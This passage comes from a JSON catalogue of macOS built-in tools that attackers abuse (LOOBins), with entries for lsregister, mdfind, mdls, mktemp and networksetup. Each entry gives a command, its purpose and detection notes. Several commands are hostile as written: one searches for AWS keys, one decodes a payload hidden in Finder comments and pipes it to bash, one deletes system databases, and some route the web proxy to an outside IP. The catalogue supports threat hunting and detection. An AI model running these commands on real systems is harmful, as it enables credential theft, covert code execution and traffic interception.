"https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/log.yml", 2664 "https://shellcromancer.io/posts/living-off-of-macos/" 2665 ] 2666 }, 2667 { 2668 "id": "loobins:lsregister:160ac1ed847c10ba", 2669 "toolId": "loobins:lsregister", 2670 "toolName": "lsregister", 2671 "name": "Force an update of the Launch Services database", 2672 "source": "LOOBins", 2673 "platform": [ 2674 "macOS" 2675 ], 2676 "capability": [ 2677 "Discovery" 2678 ], 2679 "nativeCategory": [ 2680 "Discovery" 2681 ], 2682 "command": "/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -f", 2683 "description": "The -f flag can be used to force an update of the Launch Services database. This can be used to quickly register a custom URL scheme that points to a malicious app.", 2684 "mitre": [], 2685 "fullPath": [ 2686 "/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister" 2687 ], 2688 "environment": [ 2689 "Local host" 2690 ], 2691 "availability": "Built in", 2692 "verification": "Upstream reference", 2693 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2694 "detection": [ 2695 { 2696 "type": "No detections at time of publishing", 2697 "value": "No detections at time of publishing" 2698 } 2699 ], 2700 "references": [ 2701 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/lsregister.yml", 2702 "https://www.jamf.com/blog/remote-mac-exploitation-via-custom-url-schemes/", 2703 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation" 2704 ] 2705 }, 2706 { 2707 "id": "loobins:lsregister:352322721f01970b", 2708 "toolId": "loobins:lsregister", 2709 "toolName": "lsregister", 2710 "name": "Get a list of apps and their bindings", 2711 "source": "LOOBins", 2712 "platform": [ 2713 "macOS" 2714 ], 2715 "capability": [ 2716 "Discovery" 2717 ], 2718 "nativeCategory": [ 2719 "Discovery" 2720 ], 2721 "command": "/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -E \"path:|bindings:|name: | more\"", 2722 "description": "The -dump flag can be used to get a list of apps and their bindings", 2723 "mitre": [], 2724 "fullPath": [ 2725 "/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister" 2726 ], 2727 "environment": [ 2728 "Local host" 2729 ], 2730 "availability": "Built in", 2731 "verification": "Upstream reference", 2732 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2733 "detection": [ 2734 { 2735 "type": "No detections at time of publishing", 2736 "value": "No detections at time of publishing" 2737 } 2738 ], 2739 "references": [ 2740 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/lsregister.yml", 2741 "https://www.jamf.com/blog/remote-mac-exploitation-via-custom-url-schemes/", 2742 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation" 2743 ] 2744 }, 2745 { 2746 "id": "loobins:lsregister:4e2159119984afaf", 2747 "toolId": "loobins:lsregister", 2748 "toolName": "lsregister", 2749 "name": "Delete the Launch Services database", 2750 "source": "LOOBins", 2751 "platform": [ 2752 "macOS" 2753 ], 2754 "capability": [], 2755 "nativeCategory": [ 2756 "Impact" 2757 ], 2758 "command": "lsregister -delete", 2759 "description": "The -delete flag can be used to delete the Launch Services database to impact normal operation of the system.", 2760 "mitre": [], 2761 "fullPath": [ 2762 "/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister" 2763 ], 2764 "environment": [ 2765 "Local host" 2766 ], 2767 "availability": "Built in", 2768 "verification": "Upstream reference", 2769 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2770 "detection": [ 2771 { 2772 "type": "No detections at time of publishing", 2773 "value": "No detections at time of publishing" 2774 } 2775 ], 2776 "references": [ 2777 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/lsregister.yml", 2778 "https://www.jamf.com/blog/remote-mac-exploitation-via-custom-url-schemes/", 2779 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation" 2780 ] 2781 }, 2782 { 2783 "id": "loobins:mdfind:c996ea826308e08e", 2784 "toolId": "loobins:mdfind", 2785 "toolName": "mdfind", 2786 "name": "Use mdfind to provide live updates to the number of files matching the query", 2787 "source": "LOOBins", 2788 "platform": [ 2789 "macOS" 2790 ], 2791 "capability": [ 2792 "Discovery" 2793 ], 2794 "nativeCategory": [ 2795 "Reconnaissance", 2796 "Discovery" 2797 ], 2798 "command": "mdfind -live passw", 2799 "description": "A bash or zsh oneliner can cause mdfind to provide an attacker with live updates to the number of files on a system.", 2800 "mitre": [], 2801 "fullPath": [ 2802 "/usr/bin/mdfind" 2803 ], 2804 "environment": [ 2805 "Local host" 2806 ], 2807 "availability": "Built in", 2808 "verification": "Upstream reference", 2809 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2810 "detection": [ 2811 { 2812 "type": "Jamf Protect: Detect activity related to mdfind used to search for stored AWS keys", 2813 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/mdfind_search_aws_keys" 2814 } 2815 ], 2816 "references": [ 2817 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdfind.yml", 2818 "https://youtu.be/Snwh4mMe-Cg?t=45", 2819 "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/" 2820 ] 2821 }, 2822 { 2823 "id": "loobins:mdfind:2db1dd9877d58c35", 2824 "toolId": "loobins:mdfind", 2825 "toolName": "mdfind", 2826 "name": "Use mdfind to search for AWS Keys", 2827 "source": "LOOBins", 2828 "platform": [ 2829 "macOS" 2830 ], 2831 "capability": [ 2832 "Discovery" 2833 ], 2834 "nativeCategory": [ 2835 "Reconnaissance", 2836 "Discovery" 2837 ], 2838 "command": "mdfind 'kMDItemTextContext == AKIA || kMDItemDisplayName = *AKIA* -onlyin ~'", 2839 "description": "Allows an attacker to query the filesystem via the CommandLine/Terminal to search for AWS keys.", 2840 "mitre": [], 2841 "fullPath": [ 2842 "/usr/bin/mdfind" 2843 ], 2844 "environment": [ 2845 "Local host" 2846 ], 2847 "availability": "Built in", 2848 "verification": "Upstream reference", 2849 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2850 "detection": [ 2851 { 2852 "type": "Jamf Protect: Detect activity related to mdfind used to search for stored AWS keys", 2853 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/mdfind_search_aws_keys" 2854 } 2855 ], 2856 "references": [ 2857 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdfind.yml", 2858 "https://youtu.be/Snwh4mMe-Cg?t=45", 2859 "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/" 2860 ] 2861 }, 2862 { 2863 "id": "loobins:mdfind:8bd2fd8338c96e64", 2864 "toolId": "loobins:mdfind", 2865 "toolName": "mdfind", 2866 "name": "Use mdfind to search for apps to infect", 2867 "source": "LOOBins", 2868 "platform": [ 2869 "macOS" 2870 ], 2871 "capability": [ 2872 "Discovery", 2873 "Defense Evasion" 2874 ], 2875 "nativeCategory": [ 2876 "Reconnaissance", 2877 "Discovery", 2878 "Defense Evasion" 2879 ], 2880 "command": "set appId to do shell script \"mdfind kMDItemCFBundleIdentifier = '\" & bundleId & \"'\"", 2881 "description": "Allows an attacker to determine if specific applications are installed and can be leveraged", 2882 "mitre": [], 2883 "fullPath": [ 2884 "/usr/bin/mdfind" 2885 ], 2886 "environment": [ 2887 "Local host" 2888 ], 2889 "availability": "Built in", 2890 "verification": "Upstream reference", 2891 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2892 "detection": [ 2893 { 2894 "type": "Jamf Protect: Detect activity related to mdfind used to search for stored AWS keys", 2895 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/mdfind_search_aws_keys" 2896 } 2897 ], 2898 "references": [ 2899 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdfind.yml", 2900 "https://youtu.be/Snwh4mMe-Cg?t=45", 2901 "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/" 2902 ] 2903 }, 2904 { 2905 "id": "loobins:mdls:097a7a7a4f0a3991", 2906 "toolId": "loobins:mdls", 2907 "toolName": "mdls", 2908 "name": "Validate file download information", 2909 "source": "LOOBins", 2910 "platform": [ 2911 "macOS" 2912 ], 2913 "capability": [ 2914 "Defense Evasion" 2915 ], 2916 "nativeCategory": [ 2917 "Defense Evasion" 2918 ], 2919 "command": "mdls -name \"kMDItemWhereFroms\" -name \"kMDItemDownloadedDate\"", 2920 "description": "Use mdls to validate payload download sources and timestamps to guard against sandbox executions.", 2921 "mitre": [], 2922 "fullPath": [ 2923 "/usr/bin/mdls" 2924 ], 2925 "environment": [ 2926 "Local host" 2927 ], 2928 "availability": "Built in", 2929 "verification": "Upstream reference", 2930 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2931 "detection": [ 2932 { 2933 "type": "No detections at time of publishing", 2934 "value": "No detections at time of publishing" 2935 } 2936 ], 2937 "references": [ 2938 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdls.yml", 2939 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 2940 ] 2941 }, 2942 { 2943 "id": "loobins:mdls:518fce6d16797638", 2944 "toolId": "loobins:mdls", 2945 "toolName": "mdls", 2946 "name": "Query File Paths", 2947 "source": "LOOBins", 2948 "platform": [ 2949 "macOS" 2950 ], 2951 "capability": [ 2952 "Discovery" 2953 ], 2954 "nativeCategory": [ 2955 "Discovery" 2956 ], 2957 "command": "xargs -0 mdls -n kMDItemPath -n kMDItemFSSize", 2958 "description": "Use mdls to print file paths and sizes when enumerating host resources.", 2959 "mitre": [], 2960 "fullPath": [ 2961 "/usr/bin/mdls" 2962 ], 2963 "environment": [ 2964 "Local host" 2965 ], 2966 "availability": "Built in", 2967 "verification": "Upstream reference", 2968 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 2969 "detection": [ 2970 { 2971 "type": "No detections at time of publishing", 2972 "value": "No detections at time of publishing" 2973 } 2974 ], 2975 "references": [ 2976 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdls.yml", 2977 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 2978 ] 2979 }, 2980 { 2981 "id": "loobins:mdls:c7bc602e81ff2077", 2982 "toolId": "loobins:mdls", 2983 "toolName": "mdls", 2984 "name": "Extract and execute payload stored in Finder comment metadata", 2985 "source": "LOOBins", 2986 "platform": [ 2987 "macOS" 2988 ], 2989 "capability": [ 2990 "Execution", 2991 "Collection", 2992 "Defense Evasion" 2993 ], 2994 "nativeCategory": [ 2995 "Execution", 2996 "Collection", 2997 "Defense Evasion" 2998 ], 2999 "command": "mdls -name kMDItemFinderComment -raw ~/Desktop/payload_carrier.txt | base64 -D | bash", 3000 "description": "Every file on macOS has a Finder comment field stored as Spotlight metadata under the kMDItemFinderComment attribute. mdls can read this field and pipe its contents to a decoder and executor. Because the payload lives entirely in Spotlight metadata rather than file contents, it is not visible to file-based inspection or integrity monitoring tools. Finder comments can be written remotely via osascript over Remote Apple Events or SSH, making this a covert staging mechanism for lateral movement payloads.", 3001 "mitre": [], 3002 "fullPath": [ 3003 "/usr/bin/mdls" 3004 ], 3005 "environment": [ 3006 "Local host" 3007 ], 3008 "availability": "Built in", 3009 "verification": "Upstream reference", 3010 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3011 "detection": [ 3012 { 3013 "type": "No detections at time of publishing", 3014 "value": "No detections at time of publishing" 3015 } 3016 ], 3017 "references": [ 3018 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdls.yml", 3019 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 3020 ] 3021 }, 3022 { 3023 "id": "loobins:mktemp:8ae26ff6d9e798ad", 3024 "toolId": "loobins:mktemp", 3025 "toolName": "mktemp", 3026 "name": "Generate payload directory (Shlayer)", 3027 "source": "LOOBins", 3028 "platform": [ 3029 "macOS" 3030 ], 3031 "capability": [ 3032 "Defense Evasion" 3033 ], 3034 "nativeCategory": [ 3035 "Defense Evasion" 3036 ], 3037 "command": "export tmpDir=\"$(mktemp -d /tmp/XXXXXXXXXXXX)\"", 3038 "description": "The following command can be used to generate a random directory name for staging payloads", 3039 "mitre": [], 3040 "fullPath": [ 3041 "/usr/bin/mktemp" 3042 ], 3043 "environment": [ 3044 "Local host" 3045 ], 3046 "availability": "Built in", 3047 "verification": "Upstream reference", 3048 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3049 "detection": [ 3050 { 3051 "type": "No detections at time of publishing", 3052 "value": "No detections at time of publishing" 3053 } 3054 ], 3055 "references": [ 3056 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mktemp.yml", 3057 "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/", 3058 "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/" 3059 ] 3060 }, 3061 { 3062 "id": "loobins:mktemp:adcbf3c728bcf6f7", 3063 "toolId": "loobins:mktemp", 3064 "toolName": "mktemp", 3065 "name": "Generate directory based on template file (Bundlore)", 3066 "source": "LOOBins", 3067 "platform": [ 3068 "macOS" 3069 ], 3070 "capability": [ 3071 "Defense Evasion" 3072 ], 3073 "nativeCategory": [ 3074 "Defense Evasion" 3075 ], 3076 "command": "TMP_DIR=\"mktemp -d -t x\"", 3077 "description": "The following command can be used to generate a unique directory based on a template", 3078 "mitre": [], 3079 "fullPath": [ 3080 "/usr/bin/mktemp" 3081 ], 3082 "environment": [ 3083 "Local host" 3084 ], 3085 "availability": "Built in", 3086 "verification": "Upstream reference", 3087 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3088 "detection": [ 3089 { 3090 "type": "No detections at time of publishing", 3091 "value": "No detections at time of publishing" 3092 } 3093 ], 3094 "references": [ 3095 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mktemp.yml", 3096 "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/", 3097 "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/" 3098 ] 3099 }, 3100 { 3101 "id": "loobins:networksetup:41bd049d11be4aa4", 3102 "toolId": "loobins:networksetup", 3103 "toolName": "networksetup", 3104 "name": "network device enumeration", 3105 "source": "LOOBins", 3106 "platform": [ 3107 "macOS" 3108 ], 3109 "capability": [ 3110 "Discovery" 3111 ], 3112 "nativeCategory": [ 3113 "Discovery" 3114 ], 3115 "command": "networksetup -listnetworkserviceorder", 3116 "description": "Use networksetup to display services with corresponding port and device in order they are tried for connecting to a network.", 3117 "mitre": [], 3118 "fullPath": [ 3119 "/usr/sbin/networksetup" 3120 ], 3121 "environment": [ 3122 "Local host" 3123 ], 3124 "availability": "Built in", 3125 "verification": "Upstream reference", 3126 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3127 "detection": [ 3128 { 3129 "type": "No detections at time of publishing", 3130 "value": "No detections at time of publishing" 3131 } 3132 ], 3133 "references": [ 3134 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", 3135 "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", 3136 "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", 3137 "https://objective-see.org/blog/blog_0x25.html", 3138 "https://objective-see.org/blog/blog_0x26.html", 3139 "https://objective-see.org/blog/blog_0x6D.html", 3140 "https://objective-see.org/blog/blog_0x3C.html", 3141 "https://objective-see.org/blog/blog_0x6E.html" 3142 ] 3143 }, 3144 { 3145 "id": "loobins:networksetup:f68761716a8e9334", 3146 "toolId": "loobins:networksetup", 3147 "toolName": "networksetup", 3148 "name": "Detect connected network hardware", 3149 "source": "LOOBins", 3150 "platform": [ 3151 "macOS" 3152 ], 3153 "capability": [ 3154 "Discovery" 3155 ], 3156 "nativeCategory": [ 3157 "Discovery" 3158 ], 3159 "command": "networksetup -detectnewhardware", 3160 "description": "Use networksetup to detect new network hardware and create a default network service on the hardware.", 3161 "mitre": [], 3162 "fullPath": [ 3163 "/usr/sbin/networksetup" 3164 ], 3165 "environment": [ 3166 "Local host" 3167 ], 3168 "availability": "Built in", 3169 "verification": "Upstream reference", 3170 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3171 "detection": [ 3172 { 3173 "type": "No detections at time of publishing", 3174 "value": "No detections at time of publishing" 3175 } 3176 ], 3177 "references": [ 3178 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", 3179 "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", 3180 "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", 3181 "https://objective-see.org/blog/blog_0x25.html", 3182 "https://objective-see.org/blog/blog_0x26.html", 3183 "https://objective-see.org/blog/blog_0x6D.html", 3184 "https://objective-see.org/blog/blog_0x3C.html", 3185 "https://objective-see.org/blog/blog_0x6E.html" 3186 ] 3187 }, 3188 { 3189 "id": "loobins:networksetup:fd6b13ad5483ff20", 3190 "toolId": "loobins:networksetup", 3191 "toolName": "networksetup", 3192 "name": "network device enumeration", 3193 "source": "LOOBins", 3194 "platform": [ 3195 "macOS" 3196 ], 3197 "capability": [ 3198 "Discovery" 3199 ], 3200 "nativeCategory": [ 3201 "Discovery" 3202 ], 3203 "command": "networksetup -listallhardwareports", 3204 "description": "Use networksetup to list all network interfaces, providing name, device name, MAC address.", 3205 "mitre": [], 3206 "fullPath": [ 3207 "/usr/sbin/networksetup" 3208 ], 3209 "environment": [ 3210 "Local host" 3211 ], 3212 "availability": "Built in", 3213 "verification": "Upstream reference", 3214 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3215 "detection": [ 3216 { 3217 "type": "No detections at time of publishing", 3218 "value": "No detections at time of publishing" 3219 } 3220 ], 3221 "references": [ 3222 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", 3223 "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", 3224 "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", 3225 "https://objective-see.org/blog/blog_0x25.html", 3226 "https://objective-see.org/blog/blog_0x26.html", 3227 "https://objective-see.org/blog/blog_0x6D.html", 3228 "https://objective-see.org/blog/blog_0x3C.html", 3229 "https://objective-see.org/blog/blog_0x6E.html" 3230 ] 3231 }, 3232 { 3233 "id": "loobins:networksetup:168eb6a8aa332846", 3234 "toolId": "loobins:networksetup", 3235 "toolName": "networksetup", 3236 "name": "network device enumeration", 3237 "source": "LOOBins", 3238 "platform": [ 3239 "macOS" 3240 ], 3241 "capability": [ 3242 "Discovery" 3243 ], 3244 "nativeCategory": [ 3245 "Discovery" 3246 ], 3247 "command": "networksetup -listallnetworkservices", 3248 "description": "Use networksetup to list all network interface names.", 3249 "mitre": [], 3250 "fullPath": [ 3251 "/usr/sbin/networksetup" 3252 ], 3253 "environment": [ 3254 "Local host" 3255 ], 3256 "availability": "Built in", 3257 "verification": "Upstream reference", 3258 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3259 "detection": [ 3260 { 3261 "type": "No detections at time of publishing", 3262 "value": "No detections at time of publishing" 3263 } 3264 ], 3265 "references": [ 3266 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", 3267 "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", 3268 "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", 3269 "https://objective-see.org/blog/blog_0x25.html", 3270 "https://objective-see.org/blog/blog_0x26.html", 3271 "https://objective-see.org/blog/blog_0x6D.html", 3272 "https://objective-see.org/blog/blog_0x3C.html", 3273 "https://objective-see.org/blog/blog_0x6E.html" 3274 ] 3275 }, 3276 { 3277 "id": "loobins:networksetup:5dbb2383ccf4021d", 3278 "toolId": "loobins:networksetup", 3279 "toolName": "networksetup", 3280 "name": "DNS server enumeration", 3281 "source": "LOOBins", 3282 "platform": [ 3283 "macOS" 3284 ], 3285 "capability": [ 3286 "Discovery" 3287 ], 3288 "nativeCategory": [ 3289 "Discovery" 3290 ], 3291 "command": "networksetup -getdnsservers Wi-Fi", 3292 "description": "Use networksetup to get configured DNS servers for a specific interface.", 3293 "mitre": [], 3294 "fullPath": [ 3295 "/usr/sbin/networksetup" 3296 ], 3297 "environment": [ 3298 "Local host" 3299 ], 3300 "availability": "Built in", 3301 "verification": "Upstream reference", 3302 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3303 "detection": [ 3304 { 3305 "type": "No detections at time of publishing", 3306 "value": "No detections at time of publishing" 3307 } 3308 ], 3309 "references": [ 3310 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", 3311 "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", 3312 "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", 3313 "https://objective-see.org/blog/blog_0x25.html", 3314 "https://objective-see.org/blog/blog_0x26.html", 3315 "https://objective-see.org/blog/blog_0x6D.html", 3316 "https://objective-see.org/blog/blog_0x3C.html", 3317 "https://objective-see.org/blog/blog_0x6E.html" 3318 ] 3319 }, 3320 { 3321 "id": "loobins:networksetup:7fbf514f694271c4", 3322 "toolId": "loobins:networksetup", 3323 "toolName": "networksetup", 3324 "name": "Enumerate configured web proxy URL for an interface", 3325 "source": "LOOBins", 3326 "platform": [ 3327 "macOS" 3328 ], 3329 "capability": [ 3330 "Discovery" 3331 ], 3332 "nativeCategory": [ 3333 "Discovery" 3334 ], 3335 "command": "networksetup -getautoproxyurl \"Thunderbolt Ethernet\"", 3336 "description": "Displays web proxy auto-configuration information for the specified interface.", 3337 "mitre": [], 3338 "fullPath": [ 3339 "/usr/sbin/networksetup" 3340 ], 3341 "environment": [ 3342 "Local host" 3343 ], 3344 "availability": "Built in", 3345 "verification": "Upstream reference", 3346 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3347 "detection": [ 3348 { 3349 "type": "No detections at time of publishing", 3350 "value": "No detections at time of publishing" 3351 } 3352 ], 3353 "references": [ 3354 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", 3355 "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", 3356 "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", 3357 "https://objective-see.org/blog/blog_0x25.html", 3358 "https://objective-see.org/blog/blog_0x26.html", 3359 "https://objective-see.org/blog/blog_0x6D.html", 3360 "https://objective-see.org/blog/blog_0x3C.html", 3361 "https://objective-see.org/blog/blog_0x6E.html" 3362 ] 3363 }, 3364 { 3365 "id": "loobins:networksetup:e8c626b275630b8f", 3366 "toolId": "loobins:networksetup", 3367 "toolName": "networksetup", 3368 "name": "Enumerate configured web proxy for an interface", 3369 "source": "LOOBins", 3370 "platform": [ 3371 "macOS" 3372 ], 3373 "capability": [ 3374 "Discovery" 3375 ], 3376 "nativeCategory": [ 3377 "Discovery" 3378 ], 3379 "command": "networksetup -getwebproxy \"Wi-Fi\"", 3380 "description": "Displays standard web proxy information for the specified interface.", 3381 "mitre": [], 3382 "fullPath": [ 3383 "/usr/sbin/networksetup" 3384 ], 3385 "environment": [ 3386 "Local host" 3387 ], 3388 "availability": "Built in", 3389 "verification": "Upstream reference", 3390 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3391 "detection": [ 3392 { 3393 "type": "No detections at time of publishing", 3394 "value": "No detections at time of publishing" 3395 } 3396 ], 3397 "references": [ 3398 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", 3399 "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", 3400 "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", 3401 "https://objective-see.org/blog/blog_0x25.html", 3402 "https://objective-see.org/blog/blog_0x26.html", 3403 "https://objective-see.org/blog/blog_0x6D.html", 3404 "https://objective-see.org/blog/blog_0x3C.html", 3405 "https://objective-see.org/blog/blog_0x6E.html" 3406 ] 3407 }, 3408 { 3409 "id": "loobins:networksetup:f00af425358c2200", 3410 "toolId": "loobins:networksetup", 3411 "toolName": "networksetup", 3412 "name": "Set the https web proxy for an interface", 3413 "source": "LOOBins", 3414 "platform": [ 3415 "macOS" 3416 ], 3417 "capability": [], 3418 "nativeCategory": [ 3419 "Command and Control" 3420 ], 3421 "command": "networksetup -setsecurewebproxy \"Wi-Fi\" 46.226.108.171", 3422 "description": "Use networksetup to set the https web proxy for an interface.", 3423 "mitre": [], 3424 "fullPath": [ 3425 "/usr/sbin/networksetup" 3426 ], 3427 "environment": [ 3428 "Local host" 3429 ], 3430 "availability": "Built in", 3431 "verification": "Upstream reference", 3432 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3433 "detection": [ 3434 { 3435 "type": "No detections at time of publishing", 3436 "value": "No detections at time of publishing" 3437 } 3438 ], 3439 "references": [ 3440 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", 3441 "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", 3442 "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", 3443 "https://objective-see.org/blog/blog_0x25.html", 3444 "https://objective-see.org/blog/blog_0x26.html", 3445 "https://objective-see.org/blog/blog_0x6D.html", 3446 "https://objective-see.org/blog/blog_0x3C.html", 3447 "https://objective-see.org/blog/blog_0x6E.html" 3448 ] 3449 }, 3450 { 3451 "id": "loobins:networksetup:7010ec9c106f3c12", 3452 "toolId": "loobins:networksetup", 3453 "toolName": "networksetup", 3454 "name": "Set the http web proxy for an interface", 3455 "source": "LOOBins", 3456 "platform": [ 3457 "macOS" 3458 ], 3459 "capability": [], 3460 "nativeCategory": [ 3461 "Command and Control" 3462 ], 3463 "command": "networksetup -setwebproxy \"Wi-Fi\" 46.226.108.171", 3464 "description": "Use networksetup to set the http web proxy for an interface.", 3465 "mitre": [], 3466 "fullPath": [ 3467 "/usr/sbin/networksetup" 3468 ], 3469 "environment": [ 3470 "Local host" 3471 ], 3472 "availability": "Built in", 3473 "verification": "Upstream reference", 3474 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3475 "detection": [ 3476 { 3477 "type": "No detections at time of publishing", 3478 "value": "No detections at time of publishing" 3479 } 3480 ], 3481 "references": [ 3482 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", 3483 "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", 3484 "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", 3485 "https://objective-see.org/blog/blog_0x25.html", 3486 "https://objective-see.org/blog/blog_0x26.html", 3487 "https://objective-see.org/blog/blog_0x6D.html", 3488 "https://objective-see.org/blog/blog_0x3C.html", 3489 "https://objective-see.org/blog/blog_0x6E.html" 3490 ] 3491 }, 3492 { 3493 "id": "loobins:networksetup:4a75ab18d02eb5be", 3494 "toolId": "loobins:networksetup", 3495 "toolName": "networksetup", 3496 "name": "Set auto proxy URL for an interface", 3497 "source": "LOOBins", 3498 "platform": [ 3499 "macOS" 3500 ], 3501 "capability": [], 3502 "nativeCategory": [ 3503 "Command and Control" 3504 ], 3505 "command": "networksetup -setautoproxyurl \"Wi-Fi\" $autoProxyURL", 3506 "description": "Use networksetup to set the proxy URL for an interface.", 3507 "mitre": [], 3508 "fullPath": [ 3509 "/usr/sbin/networksetup" 3510 ], 3511 "environment": [ 3512 "Local host" 3513 ], 3514 "availability": "Built in", 3515 "verification": "Upstream reference", 3516 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS 